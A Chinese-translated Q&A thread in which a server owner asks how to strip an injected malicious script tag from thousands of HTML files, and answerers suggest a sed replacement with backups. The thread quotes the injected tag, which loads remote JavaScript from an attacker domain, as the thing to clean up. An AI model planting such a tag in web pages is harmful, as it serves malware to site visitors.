0

我的服务器本周被感染了,攻击者运行了一个脚本,将一个脚本注入了几个文件,现在我的域在谷歌上被列入黑名单。

注入的代码是这样的:

<script language="JavaScript" src="http://sexfromindia.com/linkex/jquery-1.6.5.min.js" type="text/javascript"></script>

小心!这是一个恶意软件!

所以,我运行了这个命令(它是一个 linux 服务器):

grep -r "sexfromindia.com" /home/mydomain/public_html/

这个命令返回了 9941 个文件:/

我想运行一个脚本来搜索<script language="JavaScript" src="http://sexfromindia.com/linkex/jquery-1.6.5.min.js type="text/javascript"></script>并将其替换为“”(双空格)。由于所有受感染的文件都在 .html 中,因此双空格不会造成任何损害。

现在,并非所有文件都被感染,只有 9941 个(约 50%)。

我该如何清理这个烂摊子?我应该使用 awk、sed、grep、perl 吗?谁能给我例子?

谢谢。

4

2 回答 2

1

You can use a sed script and the command:

sed -i.bak -f script.sed file[s]

script.sed

s#<script language="JavaScript" src="http://sexfromindia.com/linkex/jquery-1.6.5.min.js" type="text/javascript"></script>#""#g

-i for in-place-editing with a backup.

于 2013-08-08T15:25:42.487 回答
1

我会很想采取更严厉的措施,以防万一也发生了更狡猾的事情。

就是说,似乎 sed 是这种方法。下面是一个搜索文本并替换整行的示例:使用 Sed 替换包含字符串的整行。

您可能希望在几个文件上测试您的脚本,并在开始进行更改之前备份所有内容。

于 2013-08-08T15:21:52.907 回答